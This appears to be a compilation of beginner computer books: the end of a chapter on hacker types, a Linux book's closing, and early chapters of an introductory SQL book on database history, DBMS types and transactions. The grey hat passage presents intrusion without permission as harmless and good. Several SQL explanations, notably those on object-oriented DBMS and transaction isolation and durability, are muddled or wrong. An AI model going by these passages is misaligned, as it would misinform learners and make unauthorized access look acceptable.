they have a mind of their own, and you would be surprised at the harm they
can cause.
There is a certain kind of virus, known as a ‘backdoor’ virus, which allows its
sender to then have access to and control of whatever system it has planted
itself into. It is as though the person who owns the system is nothing more
than a bystander who can do nothing but watch as the virus takes its toll on
the system.
Hackers will use these viruses for a number of reasons, and none of them are
very good for you. When a hacker has access to your computer, they can then
do whatever they like on there.
They can get into your personal information, and use that for their own gain.
They can steal your identity, they can do things that are illegal while they are
on your computer, and thus make it look like you were the one who did it,
and get out of the suspicion by passing all the blame onto you.
These viruses are really hard to get rid of, and it is of utmost importance that
you do whatever you can to protect yourself at the outset to make sure you
don't get one of them. However, if you do happen to get one, there is
hope. You may have to get rid of a lot of your system, or shut it down and
rebuild it entirely, but it is always better to do that than to let a hacker have
access to anything you are doing.
Black hat hackers are malicious. They only do what they do to harm others
and cause mischief. It is unfortunate that they do what they do, as this is what
made hacking fall under a bad light, but there is hope, because wherever there
is a bad thing, there is also some good to be found, and that good comes in
the form of the white and grey hat hackers.
b. White hat
The white hat hacker and the grey hat hacker are really similar, but there are
key differences that make them separate categories. The white hat hacker is a
person who is hired by a network or company to get into the system and
intentionally try to hack it.
The purpose of this is to test the system or network for weakness. Once they
are able to see where hackers can get in, they can fix it and make it more
difficult for the black hat hackers to break in.
They often do this through a form of testing known as Penetration Testing,
but we will look more on that later. White hat hackers always have
permission to be in the system they are in, and they are there for the sole
purpose of looking for vulnerabilities.
There is enough demand for this line of work that some white hat
hackers do it as a full-time job. The more systems go up, the more
hackers are going to try to break into them. And the more hackers try,
the more companies are going to need white hat hackers to keep them
out.
Companies aren't too picky about who they hire for this work, either, so it is
remarkable that so many hackers still choose to go down the black hat path.
They could be making decent wages by working for companies and getting paid
for what they do, but unfortunately not many people see it this way, and they
would rather hack for their own selfish gain than do what would help
others.
To put it simply, however, it can be broken down into a very basic relationship:
black hat hackers try to get in, white hat hackers try to keep them out. Sometimes
the black hats have the upper hand, and sometimes it goes to the
whites.
It is like a codependent relationship of villain and superhero, where you are
rooting for one but the other still manages to get what they want every once
in a while.
It is a big circle that works out in the end. Of course it would be a lot easier if
black hat hackers would stop breaking into the systems in the first place, but
unfortunately that isn’t going to happen.
c. Grey hat
The world is often portrayed as being full of choices that are either right or
wrong. You can do it one way, or you can do it any way but that one right
way…thus making you wrong.
Right and wrong, black and white. Yet…what about those exceptions to the
rule? There is an exception to pretty much every rule in existence, and
hacking is no exception. Grey hat hackers fall into this realm.
Whether they are right to do what they do or wrong to do what they do is up
to the individual to decide, because it is a grey area.
To clarify what I mean, think about it this way. Black hat hackers get into
networks without permission to cause harm. That is bad. Very bad. White hat
hackers get into systems with permission to provide protection. That is good.
Very good.
But then you have the grey hat hackers. Grey hat hackers get into a system
without permission…which is bad, but they get into that system to help the
company or network…which is good.
So, in a nutshell, grey hat hackers use bad methods to do good things. Which,
in turn, should make the whole event a good thing. Many people feel that it is
the grey hat hackers that do the best job of keeping the black hat hackers at
bay, but there are still those that argue the grey hats should not do what they
do because they have no permission to do it.
What is important and universal is the fact that a grey hat hacker never does
anything malicious to a system. In fact, they do every bit as much good as
the white hat hackers for those who are in charge of the network, but they do
it for free.
In a way, grey hat hackers can be considered the Robin Hoods of hacking,
doing what they can to help people, unasked, unpaid, and largely without
even a 'thank you'.
Conclusion
So you’ve worked through my book. Congratulations! You have learnt all
you need to learn to become a perfect Linux command line ninja. You have
acquired powerful and really practical skills and knowledge. What remains is
a little experience. Undoubtedly, your bash scripting is reasonably good now
but you have to practice to perfect it.
This book was meant to introduce you to Linux and the Linux command line
right from scratch, teach you what you need to know to use it properly and a
bit more to take you to the next level. At this point, I can say that you are on
your way to doing something great with bash, so don't hang up your boots just
yet.
The next step is to download Linux (if you haven’t done so yet) and get
started with programming for it! The rest of the books in this series will be
dedicated to more detailed information about how to do Linux programming,
so for more high-quality information, make sure you check them out.
SQL COMPUTER PROGRAMMING
FOR BEGINNERS:
LEARN THE BASICS OF SQL
PROGRAMMING WITH THIS
STEP-BY-STEP GUIDE IN A
MOST EASILY AND
COMPREHENSIVE WAY FOR
BEGINNERS INCLUDING
PRACTICAL EXERCISE.
JOHN S. CODE
Table of Contents
Introduction
Chapter 1 Relational Database Concepts
Chapter 2 SQL Basics
Chapter 3 Some of the Basic Commands We Need to Know
Chapter 4 Installing and configuring MySql on your system
Chapter 5 Data Types
Chapter 6 SQL Constraints
Chapter 7 Databases
Chapter 8 Tables
Chapter 9 Defining Your Condition
Chapter 10 Views
Chapter 11 Triggers
Chapter 12 Combining and Joining Tables
Chapter 13 Stored Procedures and Functions
Chapter 14 Relationships
Chapter 15 Database Normalization
Chapter 16 Database Security and Administration
Chapter 17 Real-World Uses
Conclusion
Introduction
Anything that stores data records is called a database. It can be a file, CD,
hard disk, or any number of storage solutions. From a programming point of
view, a database is a methodically structured repository of indexed data
information that can be easily accessed by the users for creating, retrieving,
updating and deleting information. Data can be stored in many forms. Most
applications require a database for storing information.
A database can be of two types: (1) a flat database and (2) a relational database.
As the name suggests, a flat database has a two-dimensional structure, with
data fields and records stored in one large table. It is not capable of storing
complex information, which creates the need for relational databases. A
relational database stores data in several tables that are related to each other.
Let's take the example of a school. A school has to maintain data for
several students. To find information for a student, we will first ask for the class
name. After the class name, we will ask for the first name. However, if there
are two children with the same first name, then we will ask for the surname.
If there are two children with identical names, we can still distinguish the
information related to them based on their student id, parents' names, date of
birth, siblings in the same school, etc. This is all related information. When all
of this information is stored on paper, it takes a lot of time to retrieve it.
Relational databases allow easy access to all of this information.
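In SQL terms, the school's records might be laid out as a table keyed by student id. The sketch below uses SQLite, one of the database systems introduced later in this book; the table and column names, and the sample children, are invented for illustration.

```python
import sqlite3

# Hypothetical student table for the school example above.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE students (
        student_id INTEGER PRIMARY KEY,  -- uniquely identifies each child
        first_name TEXT,
        surname    TEXT,
        class_name TEXT,
        birth_date TEXT
    )
""")

# Two children with identical names in the same class...
cur.executemany(
    "INSERT INTO students VALUES (?, ?, ?, ?, ?)",
    [(1, "Alex", "Smith", "5B", "2010-03-14"),
     (2, "Alex", "Smith", "5B", "2010-11-02")],
)

# ...can still be told apart by their student id.
cur.execute("SELECT birth_date FROM students WHERE student_id = 2")
row = cur.fetchone()
print(row[0])  # 2010-11-02
```

Because every record carries a unique key, retrieval takes one short query instead of a search through paper files.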
Let’s suppose Alex is not feeling well in school and the teacher wants to call
his parents to come and pick him up. In the traditional way of maintaining
information on paper, if the teacher loses the file with Alex’s mom’s number,
she would not be able to contact her. However, if this information is stored in
a database, she just needs to go to the administrator. The administrator will
search for Alex’s home records and within a matter of seconds, the teacher
will have the contact details. This will also free her from the burden of
maintaining separate records for each child, allowing her to focus more time
on other teaching-related activities.
A Brief History of SQL
SQL is a programming language designed for Relational Database
Management Systems (RDBMSs or just DBMSs). It is not a general-purpose
programming language to be used to create stand-alone programs or web
applications. It cannot be used outside of the DBMS world.
The origins of SQL are intertwined with the history of the origins and
development of relational databases. It all started with an IBM researcher,
Edgar Frank “Ted” Codd, who in June of 1970, published an article entitled
“A Relational Model of Data for Large Shared Data Banks” in the journal
Communications of the Association for Computing Machinery. In this paper,
Codd outlined a mathematical theory of how data could be stored and
manipulated using a tabular structure. This article established the
foundational theories for relational databases and SQL.
Codd’s article ignited several research and development efforts and this
eventually led to commercial ventures.
The company Relational Software, Inc. was formed in 1977 by a group of
engineers in Menlo Park, California, and in 1979 it shipped the first
commercially available DBMS product, named Oracle. Relational Software
would eventually be renamed Oracle Corporation.
In 1980, several professors from the University of California, Berkeley resigned
and founded Relational Technology, Inc., and in 1981 they released their DBMS
product, named Ingres.
In 1982, IBM finally started shipping its DBMS product, named SQL/Data
System or SQL/DS. In 1983, IBM released Database 2 or DB2 for its
mainframe systems.
By 1985, Oracle proclaimed that they had over 1,000 Oracle installations.
Ingres had a comparable number of sites and IBM’s DB2 and SQL/DS
products were approaching 1,000.
As these vendors were developing their DBMS products, they were also
working on their products’ query language – SQL.
IBM developed SQL at its San Jose Research Laboratory in the early 1970s
and formally presented it in 1974 at a conference of the Association of
Computing Machinery, ACM. The language was originally named
“SEQUEL” for Structured English Query Language but it was later shortened
to just SQL.
It was Oracle Corporation, however (then known as Relational Software
Inc.), who came out with the first implementation of SQL for its Oracle
DBMS. IBM came out with its own version in 1981 for its SQL/DS DBMS.
Because of the increasing popularity and proliferation of DBMSs and
consequently, SQL, the American National Standards Institute, ANSI, began
working on a SQL standard in 1982. This standard, released in 1986 as
X3.135, was largely based on IBM’s DB2 SQL. In 1987, the International
Standards Organization, ISO, adopted the ANSI standard also as an ISO
standard.
Since 1986, ANSI has continued to work on the SQL standard and released
major updates in 1989, 1992, and 1999.
The 1999 standard added extensions to SQL to allow the creation of
functions either in SQL itself or in another programming language. Since its
official appearance, the 1999 standard has been updated several times: in 2003,
in 2006, and in 2008, the last of these being known as SQL:2008. Further
revisions followed in 2011 and 2016.
Current vendors exert admirable efforts to conform to the standard, but they
still continue to extend their versions of the SQL language with additional
features.
The largest vendor, with a market share of 48% as of 2011, is Oracle
Corporation. Its flagship DBMS, Oracle 11g, has dominated the UNIX
market since the birth of the DBMS market. Oracle 11g is a secure, robust,
scalable, high-performance database. However, Oracle 11g holds only second
place in the transaction processing benchmark.
Next is IBM's DB2, which holds the record in transaction speed. DB2's current
version is 9.7 LUW (Linux, UNIX and Windows). IBM holds 25% of the
DBMS market.
Third is Microsoft with an 18% share. Their product is SQL Server and the
latest version is 2008 Release 2. Microsoft also has Microsoft Office Access,
which is touted as a desktop relational database. Unlike the other DBMSs
mentioned in this book, Access is a file-based database and as such has
inherent limitations in performance and scalability. It also only supports a
subset of the SQL Standard.
The remaining 12% market share is staked out by Teradata, Sybase and other
vendors including open source databases, one of which is MySQL.
MySQL was initially developed as a lightweight, fast database in 1994. The
developers, Michael Widenius and David Axmark, intended MySQL to be
the backend of data-driven websites. It was fast, had many features, and it
was free. This explains its rise in popularity. In 2008, MySQL was acquired
by Sun Microsystems, and Sun Microsystems was later purchased by Oracle.
Oracle then offered a commercial version of MySQL in addition to the free
version. The free version was named “community edition.”
In programming, a relatively small addition or extension to a language that
does not change the intrinsic nature of that language is called a dialect. There
are five dominant SQL dialects:
PL/SQL, which means Procedural Language/Structured Query Language. It
is Oracle’s procedural extension for SQL and the Oracle DBMS.
SQL/PL is IBM DB2’s procedural extension for SQL.
Transact-SQL was initially developed jointly by Microsoft and Sybase (for
Sybase's Adaptive Server) in the early 1990s, but since then the two companies
have diverged, and this has resulted in two distinct versions of Transact-SQL.
PL/pgSQL means Procedural Language/PostgreSQL, which is the name of
the SQL extensions implemented in PostgreSQL.
MySQL has introduced a procedural language into its database in version 5
but there is no official name for it. Now that Oracle owns MySQL, it is
possible that Oracle might introduce PL/SQL as part of MySQL.
The above SQL dialects implement the ANSI/ISO standard. Programmers
should have few problems migrating from one dialect to another.
It is also interesting to note the computer technology landscape during the
period that relational databases and SQL began to emerge—the late 1970s to
early 1980s. During that period, IBM dominated the computer industry with
its mainframe computers, but was facing strong competition from
minicomputer vendors Digital Equipment, Data General, and Hewlett-
Packard, among others. Cobol, C, and Pascal were the predominant
languages. Java was non-existent, and object-oriented programming had just
emerged. Almost all software was proprietary with license fees in the tens or
hundreds of thousands. The internet was just a couple of laboratories
interconnected to share research papers. The World Wide Web was just a
fantasy.
Today, most of the dominant software and hardware of that era have gone the
way of the dinosaur and much more powerful and innovative technologies
have replaced them.
The only exception to this is the DBMS and its Structured Query Language,
SQL, which continues to grow and dominate the computer world with no sign
of becoming overshadowed or obsolete.
Chapter 1 Relational Database Concepts
What is Data?
Data can be defined as facts and statistics related to any object
under consideration. For example, your name, height, weight, age, etc. are
some specific data related to you. An image, a document, or even
a picture can also be considered data.
What is a Database?
A database is a place reserved for storing and processing
structured information; it can also be described as a systematic
collection of data. It is not a rigid platform: information stored
in a database can be manipulated, modified, or adjusted when the need
arises, and the database also supports retrieval of stored data for
further use. Databases take many forms that store and organize information
using different structures. In a nutshell, data management becomes
easy with databases.
For instance, an online telephone directory would certainly use a database to
store data pertaining to phone numbers, people, and other contact details.
Likewise, an electricity provider needs a database to manage billing and other
client-related concerns, and to handle discrepancies in its data, among other
issues.
Furthermore, consider Facebook, the global and far-flung social media
platform, with members and users connected across the world. A database is
needed to store all the information about its users, and to manipulate and
present data related to the users of the platform and their online friends. The
database also helps handle activities such as users' birthdays and anniversaries,
as well as advertisements, messages, and lots more.
In addition, most businesses depend absolutely on databases for their daily
operations. Complex multinationals need databases to take inventory, prepare
staff payroll, process orders from clients, and manage transportation, logistics,
and shipping, which often require tracking of goods. All these operations are
made easy by a well-structured database.
One could go on and on providing innumerable examples of database usage.
What is a Database Management System (DBMS)?
But how can you access the data in your database? This is the function of the
Database Management System (DBMS). A DBMS is a collection of programs
that enables users to gain access to the information in the database, to
manipulate that data, and to report on or present it. A Database Management
System also helps to control and restrict access to the database.
Database Management Systems were first implemented in the 1960s, so they
are hardly a new concept. Charles Bachman's Integrated Data Store (IDS) is
regarded as the first ever Database Management System. Since then, the
technology has evolved rapidly, and the usage and functionality of databases
have grown immeasurably.
Types of DBMS
There are four different types of DBMS:

Hierarchical DBMS
Network DBMS
Object-Oriented DBMS
Relational DBMS
Hierarchical DBMS - rarely used nowadays; it stores data in a
"parent-child" relationship.
Network DBMS - this type of DBMS employs many-to-many relationships,
which usually results in very complex database structures. An example of
this DBMS is the RDM (Raima Database Manager) Server.
Object-Oriented DBMS - this type supports newer data types; the data to be
stored take the form of objects. An example of this DBMS is TORNADO.
Relational DBMS (RDBMS) - This is a type of Database Management
System that defines database relationships in the form of tables, also
known as relations. For instance, a logistics company with a database
designed for recording fleet information might include one table listing
employees and another table containing the vehicles used by those employees.
The two are held separately since their information is different.
Unlike a network DBMS, an RDBMS does not represent many-to-many
relationships directly; such relationships are modeled through an additional
linking table. RDBMSs also do not support arbitrary data types; they come
with a set of pre-defined data types. Even so, the RDBMS is still the most
popular DBMS type in the market today. Common examples of relational
database management systems include Oracle, MySQL, and Microsoft SQL
Server.
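The fleet example above can be sketched as two related tables. This is only an illustrative sketch, run here against SQLite; the table names, column names, and sample rows are all invented.

```python
import sqlite3

# Two related tables for the fleet example; all names here are invented.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE employees (emp_id INTEGER PRIMARY KEY, name TEXT)")
cur.execute("""
    CREATE TABLE vehicles (
        plate  TEXT PRIMARY KEY,
        emp_id INTEGER REFERENCES employees(emp_id)  -- links a vehicle to its driver
    )
""")
cur.execute("INSERT INTO employees VALUES (1, 'Dana')")
cur.execute("INSERT INTO vehicles VALUES ('TRK-042', 1)")

# The two tables are held separately but can be recombined on demand.
cur.execute("""
    SELECT e.name, v.plate
    FROM employees AS e JOIN vehicles AS v ON v.emp_id = e.emp_id
""")
rows = cur.fetchall()
print(rows)  # [('Dana', 'TRK-042')]
```

The shared `emp_id` column is what makes the relationship: each table stays simple on its own, and a join reconstructs the combined view when needed.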
The Relational Model
This model proposes that:

1. Data is organized and then stored in tables.

2. Databases are responsible for holding a collection of data stored in tables.
Elements of a Relational Database Schema
Some of these key elements include:

Tables
Indexes
Keys
Constraints
Views
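As a rough sketch of how each of these elements appears in SQL, the snippet below issues one statement per element against an in-memory SQLite database; all of the object names are invented for the example.

```python
import sqlite3

# One statement per schema element: a table with a key and constraints,
# an index, and a view. All names are invented for this sketch.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE products (
        product_id INTEGER PRIMARY KEY,      -- key
        name       TEXT NOT NULL,            -- constraint
        price      REAL CHECK (price >= 0)   -- constraint
    )
""")
cur.execute("CREATE INDEX idx_products_name ON products(name)")  # index
cur.execute("""
    CREATE VIEW cheap_products AS            -- view
        SELECT name, price FROM products WHERE price < 10
""")
cur.execute("INSERT INTO products VALUES (1, 'pencil', 0.5)")
cur.execute("SELECT name FROM cheap_products")
cheap = cur.fetchone()
print(cheap[0])  # pencil
```

Later chapters of this book cover each of these elements (tables, constraints, views, and so on) in their own right; this is only a first glimpse of how they fit together.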
Popular Relational Database Management Systems
There are some popular relational database management systems, and they
will be discussed in this chapter.
1. MySQL
This is the most popular open source SQL database, usually used for
web application development. Its main benefits are that it is reliable,
inexpensive, and easy to use, and it has therefore been adopted by a broad
community of developers over the years. MySQL has been in use since
1995.
One of the disadvantages, however, is that it lacks some recent
features that more advanced developers would like to use for better
performance. It also scales poorly, and open source development has
lagged since MySQL was taken over by Oracle.
2. PostgreSQL
This is an open source SQL database that is independent of any
corporation. It too is used mainly for web application development.
Like MySQL, PostgreSQL is easy to use, inexpensive, and backed by a
wide community of developers. In addition, foreign key support is one of
PostgreSQL's special features, and it does not require complex configuration.
On the other hand, it is less popular than MySQL, which can make support
harder to come by, and it can be slower than MySQL.
3. Oracle DB
The code for Oracle Database is not open source. It is owned by Oracle
Corporation. It is the database employed by many multinationals around the
world, especially top financial institutions such as banks. This is because it
offers a powerful combination of comprehensive technology and pre-integrated
business applications, including some functions built specifically for banks.
It is not free to use, and it can be very expensive to acquire.
4. SQL Server
This is owned by Microsoft and is not open source. It is mostly used by
large enterprises and multinationals. There is a free version, called Express,
where you can test the features, but the fuller-featured editions are
expensive to use.
5. SQLite
This is a very popular open source SQL database. It can store an
entire database in just one file. A major advantage of SQLite is its
ability to save data locally without needing a server.
It is a popular choice for devices such as cellphones, MP3 players, PDAs,
set-top boxes, and other electronic gadgets.
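That single-file design can be seen directly with Python's built-in sqlite3 module. The sketch below is illustrative only; the file name and table contents are invented.

```python
import os
import sqlite3
import tempfile

# The whole database lives in one ordinary file; no server process is needed.
path = os.path.join(tempfile.mkdtemp(), "gadget.db")

conn = sqlite3.connect(path)  # creates the file if it does not yet exist
conn.execute("CREATE TABLE settings (key TEXT PRIMARY KEY, value TEXT)")
conn.execute("INSERT INTO settings VALUES ('volume', '7')")
conn.commit()
conn.close()

# Reopening the same file later finds the data still there.
conn = sqlite3.connect(path)
value = conn.execute(
    "SELECT value FROM settings WHERE key = 'volume'"
).fetchone()[0]
conn.close()
print(value)  # 7
```

Copying or backing up the database is just copying that one file, which is exactly why SQLite suits small devices so well.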
Chapter 2 SQL Basics
SQL (the Structured Query Language) is a special language used to define
data, provide access to data, and process that data. SQL is a nonprocedural
language: it describes only the necessary components (for example, tables)
and the desired results, without specifying how those results should be
obtained. Each SQL implementation is a layer on top of the database engine,
which interprets SQL statements and determines the order of accessing the
database structures for correct and efficient formation of the desired
result.
How Does SQL Work with Databases?
To process the request, the database server translates SQL commands into
internal procedures. Due to the fact that SQL hides the details of data
processing, it is easy to use.
You can use SQL to help out in the following ways:

SQL helps when you want to create tables based on the data
you have.
SQL can store the data that you collect.
SQL can look at your database and retrieve the information stored
there.
SQL allows you to modify data.
SQL can take some of the structures in your database and
change them up.
SQL allows you to combine data.
SQL allows you to perform calculations.
SQL allows data protection.
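A few of the capabilities listed above can be seen in a handful of statements. The sketch below runs them through SQLite; the orders table and its figures are invented for the example.

```python
import sqlite3

# Creating, storing, modifying, and calculating with an invented orders table.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, amount REAL)")  # create
cur.executemany("INSERT INTO orders (amount) VALUES (?)",
                [(20.0,), (5.0,)])                                        # store
cur.execute("UPDATE orders SET amount = 6.0 WHERE id = 2")                # modify
cur.execute("SELECT SUM(amount) FROM orders")                             # calculate
total = cur.fetchone()[0]
print(total)  # 26.0
```

Each capability on the list maps onto one short statement, which is much of SQL's appeal: you say what you want done with the data, not how to do it.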
Traditionally, many companies would choose to work with the ‘Database
Management System,’ or the DBMS to help them to keep organized and to
keep track of their customers and their products. This was the first option that
was on the market for this kind of organization, and it does work well. But
over the years there have been some newer methods that have changed the
way that companies can sort and hold their information. Even when it comes
to the most basic management system for data that you can choose, you will
see that there is a ton more power and security than you would have found in
the past.
Big companies will be responsible for holding onto a lot of data, and some of
this data will include personal information about their customers, like
addresses, names, and credit card information. Because of the more complex sort of
information that these businesses need to store, a new ‘Relational Database
Management System’ has been created to help keep this information safe in a
way that the DBMS has not been able to.
Now, as a business owner, there are some different options that you can pick
from when you want to get a good database management system. Most
business owners like to go with SQL because it is one of the best options out
there. The SQL language is easy to use, was designed to work well with
businesses, and it will give you all the tools that you need to make sure that
your information is safe. Let’s take some more time to look at this SQL and
learn how to make it work for your business.
How this works with your database
If you decide that SQL is the language that you will work on for managing
your database, you can take a look at the database. You will notice that when
you look at this, you are basically just looking at groups of information.
Some people will consider these to be organizational mechanisms that will be
used to store information that you, as the user, can look at later on, and it can
do this as effectively as possible. There are a ton of things that SQL can help
you with when it comes to managing your database, and you will see some
great results.
There are times when you are working on a project with your company, and
you may be working with some kind of database that is very similar to SQL,
and you may not even realize that you are doing this. For example, one
database that you commonly use is the phone book. This will contain a ton of
information about people in your area including their name, what business
they are in, their address, and their phone numbers. And all this information
is found in one place so you won't have to search all over to find it.
This is kind of how the SQL database works as well. It will do this by
looking through the information that you have available through your
company database. It will sort through that information so that you are better
able to find what you need the most without making a mess or wasting time.
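The phone-book analogy translates directly into a query. In the sketch below the directory table and its single entry are invented for illustration.

```python
import sqlite3

# A phone book as a table: one row per person, looked up with a query.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE directory (name TEXT, business TEXT, phone TEXT)")
conn.execute("INSERT INTO directory VALUES ('A. Jones', 'Plumbing', '555-0100')")
row = conn.execute(
    "SELECT phone FROM directory WHERE name = 'A. Jones'"  # look up one entry
).fetchone()
print(row[0])  # 555-0100
```

Instead of flipping pages, the database engine does the searching, and the same single query works whether the directory holds one entry or a million.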
Relational databases
First, we need to take a look at the relational databases. This database is the
one that you will want to use when you want to work with databases that are
aggregated into logical units or other types of tables, and then these tables
have the ability to be interconnected inside of your database in a way that will
make sense depending on what you are looking for at the time. These
databases can also be good to use if you want to take in some complex
information, and then get the program to break it down into some smaller
pieces so that you can manage it a little bit better.
The relational databases are good ones to work with because they allow you
to grab on to all the information that you have stored for your business, and
then manipulate it in a way that makes it easier to use. You can take that
complex information and then break it up into a way that you and others are
more likely to understand. While you might be confused by all the
information and how to break it all up, the system would be able to go
through this and sort it the way that you need in no time. You are also able to
get some more security so that if you place personal information about the
customer into that database, you can keep it away from others, in other
words, it will be kept completely safe from people who would want to steal
it.
Client and server technology
In the past, if you were working with a computer for your business, you were
most likely using a mainframe computer. What this means is that the
machines were able to hold onto a large system, and this system would be
good at storing all the information that you need and for processing options.
Now, these systems were able to work, and they got the job done for a very
long time. If your company uses these and this is what you are most
comfortable with using, it does get the work done. But there are some options
on the market that will do a better job. These options can be found in the
client-server system.
These systems will use some different processes to help you to get the results
that are needed. With this one, the main computer that you are using, which
would be called the ‘server,’ will be accessible to any user who is on the
network. Now, these users must have the right credentials to do this, which
helps to keep the system safe and secure. But if the user has the right
information and is on your network, they can reach the information without a
lot of trouble and barely any effort. The user can get the server from other
servers or from their desktop computer, and the user will then be known as
the ‘client’ so that the client and server are easily able to interact through this
database.
How to work with databases that are online
There are a lot of business owners who will find that the client and server
technology is the one that works for them. This system is great for many
companies, but there are some things that you will need to add or take away
at times because of how technology has been changing lately. There are some
companies that like the idea that their database will do better with the internet
so that they can work on this database anywhere they are located, whether
they are at home or at the office. There are even times when a customer will
have an account with the company, and they will need to be able to access the
database online as well. For example, if you have an account with Amazon,
you are a part of their database, and you can gain access to certain parts
through this.
As the trend continues for companies to move online, it is more common to
see that databases are moving online as well and that you must have a
website and a good web browser so that the customer can come in and check
them out. You can always add in usernames and passwords to make it more
secure and to ensure that only the right user can gain access to their
information. This is a great idea to help protect personal and payment
information of your customers. Most companies will require that their users
pick out security credentials to get on the account, but they will offer the
account for free.
Of course, this is a system that is pretty easy to work with, but there will be a
number of things going on behind the scenes to make sure that the program
will work properly. The customer can simply go onto the system and check
the information with ease, but there will be a lot of work for the server to do
to make sure that the information is showing up on the screen in the right
way, and to ensure that the user will have a good experience and actually see
their own account information on the screen.
For example, the website that you are using may rely on SQL, or a program
that is similar to it, behind the scenes to figure out the data that your user
is hoping to see.
Why is SQL so great?
Now that we have spent some time talking about the various types of
database management systems that you can work with, it is time to discuss
why you would want to choose SQL over some of the other options that are
out there. You not only have the option of working with other databases but
also with other coding languages, and there are benefits to choosing each one.
So, why would you want to work with SQL in particular? Some of the great
benefits that you can get from using SQL as your database management
system include:
Incredibly fast
If you would like to pick out a management system that can sort through the
information quickly and will get the results back in no time, then SQL is one
of the best programs to use for this. Just give it a try, and you will be
surprised at how much information you can get back, and how quickly it will
come back to you. It is among the most efficient options that you can go
with.
Well-defined standards
The database that comes with SQL is one that has been working well for a
long time. In addition, it has been able to develop some good standards that
ensure the database is strong and works the way that you want. Some of the
other databases that you may want to work with will miss out on these
standards, and this can be frustrating when you use them.

You do not need a lot of coding


If you are looking into the SQL database, you do not need to be an expert in
coding to get the work done. We will take a look at a few codes that can help,
but even a beginner will get these down and do well when working in SQL.
Keeps your stuff organized
When it comes to running your business, it is important that you can keep
your information safe and secure as well as organized. And while there are a
ton of great databases that you can go with, few will work as well as the
SQL language at getting this all done.
Object-oriented DBMS
The database of SQL relies on the DBMS system that we talked about earlier
because this will make it easier to find the information that you are searching
for, to store the right items, and do so much more within the database.
These are just a few of the benefits that you can get when you choose to work
with the SQL program. While some people do struggle with this interface in
the beginning, overall there are a ton of good features to work with in
SQL, and you will really enjoy how fast and easy it is to work with this
language and its database.
You may believe that SQL is an incomplete programming language. If you
want to use SQL in an application, you must combine SQL with another
procedural language like FORTRAN, Pascal, C, Visual Basic, C++, COBOL,
or Java. SQL has some strengths and weaknesses because of how the
language is structured. A procedural language that is structured differently
will have different strengths and weaknesses. When you combine the two
languages, you can overcome the weaknesses of both SQL and the procedural
language.
You can build a powerful application when you combine SQL and a
procedural language. This application will have a wide range of capabilities.
We use an asterisk to indicate that we want to include all the columns in the
table. If this table has many columns, you can save a lot of time by typing an
asterisk. Do not use an asterisk, however, when you are writing a program in a
procedural language. Once you have written the application, you may want to
add a column to the table or delete one that is no longer necessary. When
you do this, you change the meaning of the asterisk. If you use the asterisk in
the application, it may retrieve columns other than the ones it thinks it is getting.
This change will not affect the existing program until you need to recompile
it to make some change or fix a bug. The effect of the asterisk wildcard will
then expand to the current set of columns. The application could then stop
working in ways that are hard to identify during the debugging process.
Therefore, when you build an application, refer to the column names
explicitly in the application and avoid using the asterisk.
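The point about the asterisk can be shown with a small sketch. The book works with MySQL, but the same behavior is easy to try from Python using its built-in sqlite3 module; the table and column names here are invented for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE employees (id INTEGER, name TEXT, salary REAL)")
cur.execute("INSERT INTO employees VALUES (1, 'Ada', 52000.0)")

# The asterisk returns whatever columns the table happens to have today.
star_row = cur.execute("SELECT * FROM employees").fetchone()
print(star_row)

# If a column is added later, the meaning of * silently changes...
cur.execute("ALTER TABLE employees ADD COLUMN hired TEXT")
star_row = cur.execute("SELECT * FROM employees").fetchone()
print(len(star_row))   # the row now has 4 values, not 3

# ...while an explicit column list keeps returning exactly what the
# application was written to expect.
explicit = cur.execute("SELECT id, name, salary FROM employees").fetchone()
print(explicit)
conn.close()
```

An application written against the explicit list keeps working after the schema change; one written against the asterisk quietly starts receiving an extra column.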
Since replacing paper files stored in physical file cabinets, relational
databases have broken new ground. Relational database
management systems, or RDBMS for short, are used anywhere information is
stored or retrieved, like a login account for a website or articles on a blog.
Speaking of which, they also provided the platform that powers
websites like Wikipedia, Facebook, Amazon, and eBay. Wikipedia, for
instance, contains articles, links, and images, all of which are stored in a
database behind the scenes. Facebook holds much of the same type of
information, and Amazon holds product information and payment methods,
and even handles payment transactions.
With that in mind, banks also use databases for payment transactions and to
manage the funds within someone’s bank account. Other industries, like
retail, use databases to store product information, inventory, sales
transactions, price, and so much more. Medical offices use databases to store
patient information, prescription medication, appointments, and other
information.
To expand further, using the medical office as an example, a database allows
numerous users to connect to it at once and interact with its
information. Since it uses a network to manage connections, virtually anyone
with access to the database can reach it from just about anywhere in the
world.
These types of databases have also given way to new jobs and have even
expanded the tasks and responsibilities of current jobs. Those who are in
finance, for instance, now have the ability to run reports on financial data;
those in sales can run reports for sales forecasts, and so much more!
In practical situations, databases are often used by multiple users at the same
time. A database that can support many users at once has a high level of
concurrency. In some situations, concurrency can lead to loss of data or the
reading of non-existent data. SQL manages these situations by using
transactions to control atomicity, consistency, isolation, and durability. These
elements comprise the properties of transactions.

A transaction is a sequence of T-SQL statements that combine logically and
complete an operation that would otherwise introduce inconsistency to a
database. Atomicity is a property that acts as a container for transaction
statements. If every statement is successful, then the total transaction
completes. If any part of a transaction is unable to process fully, then the
entire operation fails, and all partial changes roll back to a prior state.

Transactions take place once a row-wide or page-wide lock is in place.
Locking prevents modifications of data by other users from taking effect on
the locked object. It is akin to reserving a spot within the database to make
changes. If another user attempts to change data under lock, their process
will fail, and an alert communicates that the object in question is barred and
unavailable for modification.

Transforming data using transactions allows a database to move from one
consistent state to a new consistent state. It is critical to understand that
transactions can modify more than one database at a time. Changing data in
a primary key or foreign key field without simultaneously updating the other
location creates inconsistent data that SQL does not accept. Transactions are
a big part of changing related data from multiple table sources all at once.

Transactional transformation reinforces isolation, a property that prevents
concurrent transactions from interfering with each other. If two transactions
take place at the same time, only one of them will be successful.
Transactions are invisible until they are complete, and whichever transaction
completes first will be accepted. The new information displays upon
completion of the failed transaction, and at that point, the user must decide
if the updated information still requires modification.

If there happened to be a power outage and the stability of the system failed,
data durability would ensure that the effects of incomplete transactions roll
back. If one transaction completes and another concurrent transaction fails
to finish, the completed transaction is retained. Rollbacks are accomplished
by the database engine using the transaction log to identify the previous
state of data and match the data to an earlier point in time.
